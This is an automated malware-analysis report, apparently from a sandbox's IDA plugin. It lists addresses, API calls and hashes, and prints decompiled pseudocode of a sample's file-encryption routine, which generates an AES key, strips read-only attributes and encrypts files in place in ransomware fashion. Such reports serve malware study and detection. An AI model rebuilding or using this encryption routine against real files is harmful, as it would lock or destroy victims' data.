0x01302aca
0x01302ad0
0x01302ad3
0x01302ad6
0x01302ad9
0x01302ada
0x01302adf
0x01302ae6
0x01302aea
0x01302aec
0x01302aec
0x01302af2
0x01302af7
0x01302afb
0x01302afd
0x01302aff
0x01302b05
0x01302b05
0x01302b01
0x01302b01
0x01302b01
0x01302b0b
0x01302b0d
0x01302b10
0x01302b12
0x01302b16
0x01302b1b
0x01302b1c
0x01302b1e
0x01302b20
0x01302b22
0x01302b24
0x01302b26
0x01302b29
0x01302b2f
0x01302b2f
0x01302b35
0x01302b38
0x01302b3a
0x01302b3d
0x01302b42
0x01302b45
0x01302b45
0x01302b4c
0x01302b4f
0x01302b54
0x01302b54
0x01302b20
0x01302b57
0x01302b57
0x01302b5e
0x01302b65
0x01302b68
0x01302b6b
0x01302b74
0x01302b78
0x01302b7d
0x01302b7d
0x01302b80
0x01302b88
0x01302b8b
0x01302b8d
0x01302bcc
0x01302bd2
0x01302bdd
0x01302be0
0x01302be8
0x01302beb
0x01302bed
0x00000000
0x01302bf3
0x01302c01
0x01302c04
0x01302c09
0x01302c10
0x01302c17
0x01302c1f
0x01302c2d
0x01302c34
0x01302c3b
0x01302c47
0x01302c4e
0x01302c53
0x01302c56
0x01302c5a
0x01302c5e
0x01302c60
0x01302c60
0x01302c66
0x01302c6b
0x01302c6f
0x01302c71
0x01302c73
0x01302c79
0x01302c79
0x01302c75
0x01302c75
0x01302c75
0x01302c7f
0x01302c81
0x01302c84
0x01302c87
0x01302c89
0x01302c8d
0x01302c92
0x01302c93
0x01302c95
0x01302c97
0x01302c99
0x01302c9b
0x01302c9d
0x01302ca0
0x01302ca6
0x01302ca6
0x01302cac
0x01302caf
0x01302cb1
0x01302cb4
0x01302cb9
0x01302cbc
0x01302cbc
0x01302cc3
0x01302cc6
0x01302ccb
0x01302ccb
0x01302c97
0x01302cce
0x01302cce
0x01302cd5
0x01302cd8
0x01302cdb
0x01302ce4
0x01302ce8
0x01302ced
0x01302ced
0x01302cf2
0x01302cf9
0x01302cfd
0x01302d03
0x01302d0a
0x01302d0d
0x01302d16
0x01302d1d
0x01302d22
0x01302d22
0x01302d27
0x01302d2e
0x01302d35
0x01302d3b
0x01302d45
0x01302d4f
0x01302d52
0x01302d5b
0x01302d62
0x01302d67
0x01302d67
0x01302d6a
0x01302d70
0x01302d73
0x01302d77
0x00000000
0x01302d7d
0x01302d7d
0x01302d83
0x01302d8e
0x01302d91
0x01302d93
0x00000000
0x01302d99
0x01302d99
0x01302da0
0x01302dac
0x01302daf
0x01302db7
0x01302dba
0x01302dbc
0x00000000
0x01302dc2
0x01302dc2
0x01302dc9
0x01302dd8
0x01302dda
0x01302de2
0x01302de5
0x01302de7
0x00000000
0x01302ded
0x01302df2
0x01302df5
0x01302df8
0x01302dfc
0x01302dfe
0x01302dfe
0x01302e04
0x01302e09
0x01302e10
0x01302e12
0x01302e14
0x01302e1a
0x01302e1a
0x01302e16
0x01302e16
0x01302e16
0x01302e20
0x01302e22
0x01302e29
0x01302e2c
0x01302e2f
0x01302e31
0x01302e35
0x01302e3a
0x01302e3b
0x01302e3d
0x01302e3f
0x01302e41
0x01302e43
0x01302e45
0x01302e48
0x01302e4e
0x01302e4e
0x01302e54
0x01302e57
0x01302e59
0x01302e5c
0x01302e61
0x01302e64
0x01302e64
0x01302e6b
0x01302e6e
0x01302e73
0x01302e76
0x01302e76
0x01302e3f
0x01302e3b
0x01302e79
0x01302e7b
0x01302e8e
0x01302e91
0x01302e98
0x01302e9b
0x01302e9d
0x01302e9f
0x01302ea7
0x01302ead
0x01302eb6
0x01302eb6
0x01302ebc
0x01302ec1
0x01302ecf
0x01302ed6
0x01302ed9
0x01302edc
0x01302ee2
0x01302ee8
0x01302eea
0x013031f0
0x013031f5
0x00000000
0x01302ef0
0x01302ef0
0x01302ef7
0x01302f00
0x01302f04
0x01302f09
0x01302f0b
0x01302f0e
0x01302f11
0x01302f15
0x01302f17
0x01302f43
0x01302f43
0x01302f19
0x01302f19
0x01302f1c
0x01302f20
0x01302f2c
0x01302f33
0x01302f3a
0x01302f3f
0x01302f3f
0x01302f45
0x01302f49
0x01302f4c
0x01302f4e
0x013031fa
0x013031ff
0x00000000
0x01302f54
0x01302f54
0x01302f58
0x01302f5f
0x01302f61
0x01302f63
0x01302f6e
0x01302f76
0x01302f7c
0x01302f82
0x01302f84
0x00000000
0x00000000
0x00000000
0x00000000
0x01302f65
0x01302f65
0x01302f8a
0x01302f8a
0x01302f8e
0x01302f97
0x01302fa3
0x01302fa5
0x01302fa8
0x01302fab
0x01302faf
0x01302fb1
0x01302fdd
0x01302fdd
0x01302fb3
0x01302fb3
0x01302fb6
0x01302fba
0x01302fc6
0x01302fcd
0x01302fd9
0x01302fd9
0x01302fdf
0x01302fe3
0x01302fe6
0x01302fe8
0x00000000
0x01302fee
0x01302fee
0x01302ff7
0x01302ffe
0x01303000
0x01303003
0x01303005
0x01303048
0x01303052
0x01303058
0x0130305e
0x01303060
0x01303204
0x01303209
0x0130320e
0x0130320f
0x01303210
0x01303211
0x01303213
0x01303215
0x01303220
0x01303224
0x01303229
0x0130322b
0x0130322e
0x0130322f
0x01303230
0x01303234
0x0130323a
0x01303240
0x01303243
0x01303247
0x0130324a
0x0130324f
0x01303257
0x0130325b
0x0130325c
0x01303261
0x01303264
0x01303267
0x0130326a
0x01303291
0x01303291
0x01303292
0x0130326c
0x0130326c
0x0130326f
0x01303272
0x01303281
0x01303288
0x01303274
0x01303275
0x0130327c
0x0130327c
0x01303272
0x0130329a
0x013032a1
0x013032a8
0x013032b6
0x013032b8
0x013032c2
0x013032c5
0x013032cc
0x013032d4
0x013032e0
0x013032e8
0x013032ef
0x013032f7
0x01303304
0x01303309
0x0130330c
0x0130330e
0x01303310
0x0130344b
0x01303452
0x01303460
0x01303463
0x01303468
0x0130346b
0x0130346e
0x01303470
0x01303470
0x01303471
0x00000000
0x01303471
0x00000000
0x01303316
0x01303316
0x01303317
0x0130331a
0x0130331f
0x01303326
0x01303335
0x01303338
0x0130333c
0x01303346
0x01303348
0x01303351
0x01303358
0x0130335c
0x01303361
0x01303363
0x01303366
0x01303369
0x013033e4
0x013033e7
0x013033ea
0x013033ee
0x013033f0
0x013033fd
0x01303402
0x01303403
0x01303403
0x01303407
0x0130340c
0x01303410
0x01303414
0x01303417
0x0130341e
0x01303425
0x01303428
0x0130342d
0x01303432
0x01303439
0x01303440
0x01303443
0x01303446
0x01303472
0x01303475
0x0130347a
0x0130347d
0x01303482
0x0130348b
0x0130348f
0x01303499
0x0130336b
0x0130336b
0x01303370
0x0130349c
0x00000000
0x01303376
0x01303376
0x01303379
0x0130337e
0x0130338c
0x0130338e
0x01303380
0x01303380
0x01303380
0x01303393
0x0130339e
0x013033a0
0x013033a6
0x013034a1
0x013034a1
0x013034a6
0x013034a7
0x013034a8
0x013034a9
0x013034aa
0x013034ab
0x013034ac
0x013034ad
0x013034ae
0x013034af
0x013034b0
0x013034b1
0x013034b3
0x013034b6
0x013034b7
0x013034b9
0x013034bc
0x013034bc
0x013034bf
0x013034c0
0x013034c2
0x013034c5
0x013034c7
0x013034df
0x013034e4
0x013034e7
0x013034ea
0x013034ee
0x013034f1
0x013034f3
0x01303526
0x01303528
0x013035fb
0x01303600
0x01303601
0x01303602
0x01303603
0x01303604
0x01303605
0x01303606
0x01303607
0x01303608
0x01303609
0x0130360a
0x0130360b
0x0130360c
0x0130360d
0x0130360e
0x0130360f
0x01303610
0x01303611
0x01303616
0x01303617
0x01303619
0x0130361c
0x0130361d
0x0130361e
0x01303621
0x01303626
0x0130362b
0x0130362e
0x01303631
0x01303634
0x01303636
0x01303679
0x0130367b
0x01303753
0x01303758
0x01303759
0x0130375a
0x0130375b
0x0130375c
0x0130375d
0x0130375e
0x0130375f
0x01303760
0x01303763
0x01303764
0x01303765
0x01303767
0x01303773
0x01303776
0x0130377b
0x01303782
0x01303784
0x0130378b
0x0130378e
0x01303791
0x01303796
0x0130379b
0x013037a2
0x013037a9
0x013037b2
0x01303681
0x01303684
0x01303687
0x0130368d
0x0130369a
0x013036a5
0x013036a7
0x013036b3
0x013036b5
0x013036b7
0x013036a9
0x013036a9
0x013036a9
0x0130368f
0x0130368f
0x0130368f
0x013036ba
0x013036bd
0x013036c1
0x013036c9
0x013036cf
0x013036d2
0x013036d9
0x013036e0
0x013036e3
0x013036e4
0x01303723
0x01303724
0x01303725
0x0130372a
0x0130372a
0x01303732
0x0130373a
0x01303740
0x01303750
0x013036e6
0x013036e6
0x013036e8
0x013036e9
0x013036ea
0x013036f2
0x013036f9
0x01303701
0x01303708
0x01303708
0x01303709
0x0130370b
0x01303716
0x01303720
0x01303720
0x013036e4
0x01303638
0x01303638
0x0130363e
0x01303641
0x01303643
0x01303646
0x01303648
0x0130364a
0x0130364a
0x01303656
0x01303661
0x01303661
0x01303666
0x0130366f
0x0130366f
0x0130352e
0x0130352e
0x01303531
0x01303537
0x01303544
0x0130354f
0x01303551
0x0130355d
0x0130355f
0x01303561
0x01303553
0x01303553
0x01303553
0x01303539
0x01303539
0x01303539
0x01303564
0x01303567
0x0130356b
0x01303576
0x0130357d
0x01303580
0x01303585
0x0130358c
0x0130358f
0x01303590
0x013035cd
0x013035ce
0x013035cf
0x013035d4
0x013035d4
0x013035dc
0x013035e4
0x013035f8
0x01303592
0x01303592
0x01303594
0x01303595
0x01303596
0x0130359e
0x013035a5
0x013035ad
0x013035b4
0x013035b4
0x013035b5
0x013035b7
0x013035bc
0x013035c2
0x013035ca
0x013035ca
0x01303590
0x013034f5
0x013034f8
0x013034fa
0x013034fd
0x013034ff
0x013034ff
0x01303505
0x01303505
0x0130350a
0x01303512
0x0130351c
0x0130351c
0x013034c9
0x013034c9
0x013034cd
0x013034cf
0x013034cf
0x013034d1
0x013034d4
0x013034dc
0x013034dc
0x013033ac
0x013033b5
0x013033ba
0x013033c0
0x013033c7
0x013033d1
0x013033d5
0x013033da
0x013033dd
0x00000000
0x013033dd
0x013033a6
0x01303370
0x01303369
0x01303066
0x00000000
0x01303066
0x01303007
0x01303007
0x0130300d
0x0130300d
0x01303014
0x0130301b
0x0130301e
0x01303021
0x01303028
0x0130302c
0x0130302e
0x0130302e
0x01303034
0x01303039
0x0130303d
0x0130303f
0x01303041
0x01303068
0x01303068
0x01303043
0x01303043
0x01303043
0x0130306a
0x0130307c
0x01303081
0x01303084
0x0130308b
0x01303090
0x0130309c
0x013030a6
0x013030a9
0x013030ac
0x013030af
0x013030b1
0x013030b6
0x013030bb
0x013030bc
0x013030be
0x013030c0
0x013030c2
0x013030c4
0x013030c6
0x013030c9
0x013030cf
0x013030d2
0x013030d2
0x013030d8
0x013030db
0x013030dd
0x013030e0
0x013030e5
0x013030e8
0x013030eb
0x013030eb
0x013030f2
0x013030f5
0x013030fa
0x013030fa
0x013030c0
0x013030fd
0x013030fd
0x01303104
0x0130310b
0x01303114
0x01303119
0x0130311a
0x0130311c
0x0130311e
0x01303120
0x01303123
0x01303129
0x01303129
0x0130312f
0x01303132
0x01303134
0x01303137
0x0130313c
0x0130313f
0x0130313f
0x01303146
0x01303149
0x0130314e
0x0130314e
0x01303151
0x0130315e
0x01303163
0x01303168
0x01303169
0x0130316b
0x0130316d
0x0130316f
0x01303172
0x01303178
0x01303178
0x0130317e
0x01303181
0x01303183
0x01303186
0x0130318b
0x0130318e
0x0130318e
0x01303195
0x01303198
0x0130319d
0x013031a6
0x013031ae
0x013031b0
0x013031b6
0x013031b9
0x013031bf
0x013031c2
0x013031c6
0x00000000
0x013031cc
0x013031cc
0x013031d2
0x013031d5
0x01302bac
0x01302baf
0x01302bb8
0x01302bbc
0x01302bc9
0x01302bc9
0x01303005
0x01302fe8
0x01302f63
0x01302f4e
0x01302e7d
0x01302e7d
0x01302e83
0x00000000
0x01302e83
0x01302e7b
0x01302de7
0x01302dbc
0x01302d93
0x01302d77
0x01302b8f
0x01302b8f
0x01302b95
0x01302b98
0x01302b9b
0x01302b9e
0x01302ba1
0x00000000
0x01302ba1
0x01302b8d
0x01302a72
0x01302a5c
0x01302a2f
0x01302a06
0x013029db
0x013029b2
0x0130298d
0x01302943
0x01302943
0x01302943
0x00000000
0x01302943
0x0130288c
0x0130288c
0x00000000
0x0130288c
0x0130288a
0x0130281f
0x01302809
0x013027dc
0x013027b2
0x013026d2
0x01302689
0x0130267f
0x01302677
0x012faef3
0x012facd4
0x012facd4
0x012facdf
0x012face6
0x012face7
0x012facf5
0x012facfa
0x012fad01
0x00000000
0x012fad01
0x012facce
0x012facaf
0x012fac6c

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,00000010), ref: 012FAC04
CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000010), ref: 012FAE50

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: File$CopyModuleName
String ID:
API String ID: 4108865673-0
Opcode ID: 0ff06bd36971ad099e9643d60ddf633982c3511e4e061dab35bb33870a697445
Instruction ID: 0bb4c54c4cc8592926d4a591a9c8f955c527b5c88a0f08e13f247154389224f9
Opcode Fuzzy Hash: 0ff06bd36971ad099e9643d60ddf633982c3511e4e061dab35bb33870a697445
Instruction Fuzzy Hash: C3128270D10249DFEB21DFA8C845BAEFBF4FF58314F108269D919A7291E774AA84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01308BC0, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 303
encryptionfileCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E01308BC0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags, void* _a4) {
				long _v8;
				char _v16;
				signed int _v20;
				long* _v24;
				long* _v28;
				signed int _v32;
				long _v36;
				short _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				long _v64;
				char _v68;
				signed int _v72;
				long _v76;
				short _v92;
				intOrPtr _v96;
				long _v100;
				long _v104;
				char _v108;
				char _v112;
				signed int _v116;
				long _v120;
				short _v136;
				signed int _v140;
				long _v144;
				short _v160;
				long _v164;
				long _v168;
				long _v172;
				char _v176;
				signed int _v180;
				char _v200;
				intOrPtr _v204;
				long _v208;
				long _v212;
				char _v216;
				void* _v220;
				intOrPtr _v224;
				signed int _v228;
				long _v232;
				short _v248;
				long _v252;
				intOrPtr _v256;
				long _v260;
				char _v264;
				signed int _v268;
				long _v272;
				short _v288;
				void* __esi;
				void* __ebp;
				signed int _t139;
				signed int _t140;
				long** _t151;
				signed int _t152;
				signed int _t154;
				long** _t159;
				char* _t161;
				WCHAR* _t162;
				long _t164;
				WCHAR* _t166;
				void* _t167;
				void* _t169;
				void* _t176;
				signed int _t179;
				char _t183;
				signed int _t184;
				signed int _t186;
				signed int _t188;
				signed int _t200;
				intOrPtr* _t207;
				long _t222;
				WCHAR* _t223;
				void* _t237;
				WCHAR* _t241;
				intOrPtr _t243;
				void* _t244;
				signed int _t247;
				void* _t248;
				void* _t249;

				_t237 = __edx;
				_push(0xffffffff);
				_push(0x1366d15);
				_push( *[fs:0x0]);
				_t249 = _t248 - 0x110;
				_t139 =  *0x13a4018; // 0x39cca9f6
				_t140 = _t139 ^ _t247;
				_v20 = _t140;
				_push(__ebx);
				_push(__edi);
				_push(_t140);
				 *[fs:0x0] =  &_v16;
				_t207 = __ecx;
				_t243 = E0130A5C0();
				_v224 = _t243;
				if( *((char*)(__ecx + 0x18)) == 0) {
					L39:
					 *[fs:0x0] = _v16;
					_pop(_t244);
					return E0132EA79(_v20 ^ _t247, _t244);
				}
				if( *((intOrPtr*)(_t243 + 0x20)) == 0 ||  *((intOrPtr*)(_t243 + 0x28)) == 0) {
					L38:
					 *((char*)(_t243 + 0x2c)) = 0;
					goto L39;
				} else {
					_t8 = _t243 + 0x10; // 0x10
					_t241 = _t8;
					if(E01309210(__ecx, __ecx, _t241, _t241) != 0) {
						goto L38;
					}
					_v212 = 0;
					_v208 = 4;
					_v204 = 0x26;
					_v8 = 0;
					_v216 = 0x1396b08;
					E012F60E0(__ecx,  &_v200, _t237, _t241);
					_v8 = 1;
					 *((intOrPtr*)( *__ecx + 4))();
					_v104 = 0;
					_v100 = 3;
					_v96 = 0x27;
					_v8 = 2;
					_v108 = 0x1396b2c;
					E012F60E0(__ecx,  &_v92, _t237, _t241, _t241,  &_v216);
					_v8 = 3;
					 *((intOrPtr*)( *__ecx + 4))();
					_t151 =  &_v28;
					_v28 = 0;
					__imp__CryptAcquireContextW(_t151, 0, L"Microsoft Enhanced RSA and AES Cryptographic Provider", 0x18, 0xf0000000,  &_v108, _t241);
					if(_t151 == 0) {
						L34:
						_t152 = _v72;
						_v108 = 0x1396b2c;
						if(_t152 >= 8) {
							_push(2 + _t152 * 2);
							E012F56A0(_t207, _t241, _v92);
							_t249 = _t249 + 8;
						}
						_v76 = 0;
						_v92 = 0;
						_t154 = _v180;
						_v72 = 7;
						_v108 = 0x1396ae4;
						_v216 = 0x1396b08;
						if(_t154 >= 8) {
							_push(2 + _t154 * 2);
							E012F56A0(_t207, _t241, _v200);
						}
						goto L39;
					}
					_t159 =  &_v24;
					_v24 = 0;
					__imp__CryptGenKey(_v28, 0x6610, 1, _t159);
					if(_t159 == 0) {
						L32:
						CryptReleaseContext(_v28, 0);
						_t222 = 4;
						_t161 =  &_v28;
						do {
							 *_t161 = 0;
							_t161 = _t161 + 1;
							_t222 = _t222 - 1;
						} while (_t222 != 0);
						goto L34;
					}
					_t162 = _t241;
					if(_t241[0xa] >= 8) {
						_t162 =  *_t241;
					}
					_t164 = GetFileAttributesW(_t162) & 0xfffffffe;
					_t223 = _t241;
					if(_t241[0xa] >= 8) {
						_t223 =  *_t241;
					}
					SetFileAttributesW(_t223, _t164);
					_t166 = _t241;
					if(_t241[0xa] >= 8) {
						_t166 =  *_t241;
					}
					_t167 = CreateFileW(_t166, 0xc0000000, 0, 0, 3, 0x80, 0);
					_v220 = _t167;
					if(_t167 != 0xffffffff) {
						_t224 =  *((intOrPtr*)(_t243 + 0x28));
						if( *((intOrPtr*)(_t243 + 0x28)) != 3) {
							_t169 = E01309380(_t207, _t207, _t237, _t241, _v24, _t167, _t224);
						} else {
							_t169 = E01309740(_t207, _t207, _t237, _t241, _v24, _t167);
						}
						_push(_v220);
						if(_t169 == 0) {
							CloseHandle();
						} else {
							CloseHandle();
							_v64 = 0;
							_v60 = 2;
							_v56 = 0xc;
							_v68 = 0x1396adc;
							_v36 = 0;
							_v32 = 7;
							_v52 = 0;
							_v8 = 4;
							 *((intOrPtr*)( *_t207 + 4))();
							_t238 = _t241;
							_t176 = E01307020(_t207,  &_v288, _t241, _t241);
							_t249 = _t249 + 4;
							_v172 = 0;
							_v168 = 6;
							_v164 = 9;
							_v8 = 6;
							_v176 = 0x1396aec;
							E012F60E0(_t207,  &_v160, _t241, _t241, _t241,  &_v52);
							_v8 = 7;
							E012F60E0(_t207,  &_v136, _t241, _t241, _t176,  &_v68);
							_v112 = 0;
							_v8 = 9;
							_t179 = _v268;
							if(_t179 >= 8) {
								_push(2 + _t179 * 2);
								E012F56A0(_t207, _t241, _v288);
								_t249 = _t249 + 8;
							}
							_v272 = 0;
							_v288 = 0;
							_v268 = 7;
							 *((intOrPtr*)( *_t207 + 4))( &_v176);
							_t183 = _v112;
							 *((char*)(_v224 + 0x2c)) = _t183;
							if(_t183 != 0) {
								_v260 = 0;
								_v256 = 2;
								_v252 = 0xa;
								_v8 = 0xa;
								_v264 = 0x1396b34;
								E012F60E0(_t207,  &_v248, _t238, _t241);
								_v8 = 0xb;
								 *((intOrPtr*)( *((intOrPtr*)( *_t207 + 4))))( &_v264, _t241);
								_t200 = _v228;
								_v264 = 0x1396b34;
								if(_t200 >= 8) {
									_push(2 + _t200 * 2);
									E012F56A0(_t207, _t241, _v248);
									_t249 = _t249 + 8;
								}
								_v232 = 0;
								_v228 = 7;
								_v248 = 0;
								_v264 = 0x1396ae4;
							}
							_t184 = _v116;
							_v176 = 0x1396aec;
							if(_t184 >= 8) {
								_push(2 + _t184 * 2);
								E012F56A0(_t207, _t241, _v136);
								_t249 = _t249 + 8;
							}
							_v120 = 0;
							_v136 = 0;
							_t186 = _v140;
							_v116 = 7;
							if(_t186 >= 8) {
								_push(2 + _t186 * 2);
								E012F56A0(_t207, _t241, _v160);
								_t249 = _t249 + 8;
							}
							_v144 = 0;
							_v160 = 0;
							_t188 = _v32;
							_v140 = 7;
							_v176 = 0x1396ae4;
							_v68 = 0x1396adc;
							if(_t188 >= 8) {
								_push(2 + _t188 * 2);
								E012F56A0(_t207, _t241, _v52);
								_t249 = _t249 + 8;
							}
							_v36 = 0;
							_v32 = 7;
							_v52 = 0;
							_v68 = 0x1396ae4;
						}
					}
					CryptDestroyKey(_v24);
					goto L32;
				}
			}

0x01308bc0
0x01308bc3
0x01308bc5
0x01308bd0
0x01308bd1
0x01308bd7
0x01308bdc
0x01308bde
0x01308be1
0x01308be3
0x01308be4
0x01308be8
0x01308bee
0x01308bfc
0x01308bfe
0x01308c04
0x01309099
0x0130909c
0x013090a5
0x013090b4
0x013090b4
0x01308c0e
0x01309095
0x01309095
0x00000000
0x01308c1e
0x01308c1e
0x01308c1e
0x01308c2b
0x00000000
0x00000000
0x01308c31
0x01308c3b
0x01308c45
0x01308c4f
0x01308c5d
0x01308c67
0x01308c6c
0x01308c7e
0x01308c81
0x01308c88
0x01308c8f
0x01308c96
0x01308c9e
0x01308ca5
0x01308caa
0x01308cb6
0x01308cc7
0x01308cca
0x01308cd2
0x01308cda
0x0130902b
0x0130902b
0x0130902e
0x01309038
0x01309041
0x01309045
0x0130904a
0x0130904a
0x0130904f
0x01309056
0x0130905a
0x01309060
0x01309067
0x0130906e
0x0130907b
0x01309084
0x0130908b
0x01309090
0x00000000
0x0130907b
0x01308ce0
0x01308ce3
0x01308cf5
0x01308cfd
0x01309008
0x0130900d
0x01309013
0x01309018
0x01309020
0x01309020
0x01309023
0x01309026
0x01309026
0x00000000
0x01309020
0x01308d07
0x01308d09
0x01308d0b
0x01308d0b
0x01308d14
0x01308d17
0x01308d1d
0x01308d1f
0x01308d1f
0x01308d23
0x01308d2d
0x01308d2f
0x01308d31
0x01308d31
0x01308d46
0x01308d4c
0x01308d55
0x01308d5b
0x01308d61
0x01308d77
0x01308d63
0x01308d69
0x01308d69
0x01308d7c
0x01308d84
0x01308ff9
0x01308d8a
0x01308d8a
0x01308d92
0x01308d99
0x01308da0
0x01308da7
0x01308dae
0x01308db5
0x01308dbc
0x01308dc0
0x01308dcc
0x01308dd2
0x01308ddb
0x01308de0
0x01308de5
0x01308def
0x01308df9
0x01308e03
0x01308e0e
0x01308e18
0x01308e24
0x01308e28
0x01308e2d
0x01308e31
0x01308e35
0x01308e3e
0x01308e47
0x01308e4e
0x01308e53
0x01308e53
0x01308e58
0x01308e62
0x01308e74
0x01308e7e
0x01308e87
0x01308e8a
0x01308e8f
0x01308e97
0x01308ea1
0x01308eab
0x01308eb8
0x01308ec3
0x01308ecd
0x01308ed8
0x01308edf
0x01308ee1
0x01308ee7
0x01308ef4
0x01308efd
0x01308f04
0x01308f09
0x01308f09
0x01308f0e
0x01308f18
0x01308f22
0x01308f29
0x01308f29
0x01308f33
0x01308f36
0x01308f43
0x01308f4c
0x01308f53
0x01308f58
0x01308f58
0x01308f5d
0x01308f64
0x01308f6b
0x01308f71
0x01308f7b
0x01308f84
0x01308f8b
0x01308f90
0x01308f90
0x01308f95
0x01308f9f
0x01308fa6
0x01308fa9
0x01308fb3
0x01308fbd
0x01308fc7
0x01308fd0
0x01308fd4
0x01308fd9
0x01308fd9
0x01308fde
0x01308fe5
0x01308fec
0x01308ff0
0x01308ff0
0x01308d84
0x01309002
0x00000000
0x01309002

APIs

Part of subcall function 01309210: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,00000010,00000000,?,?,?,?,?,?,01308C29), ref: 01309253
Part of subcall function 01309210: SetFilePointerEx.KERNEL32(00000000,?,?,?,00000002,?,?,?,?,?,?,01308C29,00000010,39CCA9F6), ref: 01309293
Part of subcall function 01309210: ReadFile.KERNEL32(00000000,?,00000018,?), ref: 013092B7
Part of subcall function 01309210: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,01308C29,00000010,39CCA9F6), ref: 0130935E

CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 01308CD2
CryptGenKey.ADVAPI32(00000000,00006610,00000001,?), ref: 01308CF5
GetFileAttributesW.KERNEL32(00000010), ref: 01308D0E
SetFileAttributesW.KERNEL32(00000010,00000000), ref: 01308D23
CreateFileW.KERNEL32(00000010,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 01308D46
CloseHandle.KERNEL32(?,00000000,00000000,?), ref: 01308D8A

Part of subcall function 01309380: GetFileSizeEx.KERNEL32(?,?,?,00000000,00002000,39CCA9F6,00000010,00000000), ref: 013093F9
Part of subcall function 01309380: SetFilePointerEx.KERNEL32(?,?,00000000,01366D55,00000001,?,?,?,00000000,00000000), ref: 013094D7
Part of subcall function 01309380: ReadFile.KERNEL32(?,00000000,00100000,00000000,00000000,?,?,?,00000000,00000000), ref: 013094FD

Part of subcall function 012F60E0: Concurrency::cancel_current_task.LIBCPMT ref: 012F6188

CloseHandle.KERNEL32(?,00000000,00000000,?), ref: 01308FF9
CryptDestroyKey.ADVAPI32(00000000), ref: 01309002
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0130900D

Strings

', xrefs: 01308C8F
Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 01308CC0
&, xrefs: 01308C45

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: File$Crypt$CloseHandle$AttributesContextCreatePointerRead$AcquireConcurrency::cancel_current_taskDestroyReleaseSize
String ID: &$'$Microsoft Enhanced RSA and AES Cryptographic Provider
API String ID: 3888833340-43143629
Opcode ID: f48df68ae7c5580a78236682f73c08265bca24723a309dfca584cb6826363fbc
Instruction ID: 1596f13587eb77e60630d8988006368b1d63abd7a0318d9ea5bd6f5e0dbd2583
Opcode Fuzzy Hash: f48df68ae7c5580a78236682f73c08265bca24723a309dfca584cb6826363fbc
Instruction Fuzzy Hash: 84D16AB0910258DFEF21CFA4DC58BAEBBF8BF14308F104199E509A7291D7759A88CF61

Uniqueness

Uniqueness Score: -1.00%

Function 01310C10, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 178encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000,39CCA9F6), ref: 01310CA5
CryptImportKey.ADVAPI32(00000000,00000208,0000002C,00000000,00000001,00000010), ref: 01310D05
CryptSetKeyParam.ADVAPI32(00000010,00000001,?,00000000), ref: 01310D26
CryptSetKeyParam.ADVAPI32(00000010,00000004,?,00000000), ref: 01310D46
CryptDuplicateKey.ADVAPI32(00000010,00000000,00000000,?), ref: 01310D5E
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,00000000), ref: 01310D85
CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,?,?,?,00000000), ref: 01310DE1
CryptDestroyKey.ADVAPI32(00000000), ref: 01310E12
CryptDestroyKey.ADVAPI32(00000010), ref: 01310E1B
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 01310E26

Strings

Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 01310C93
, xrefs: 01310CDA

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

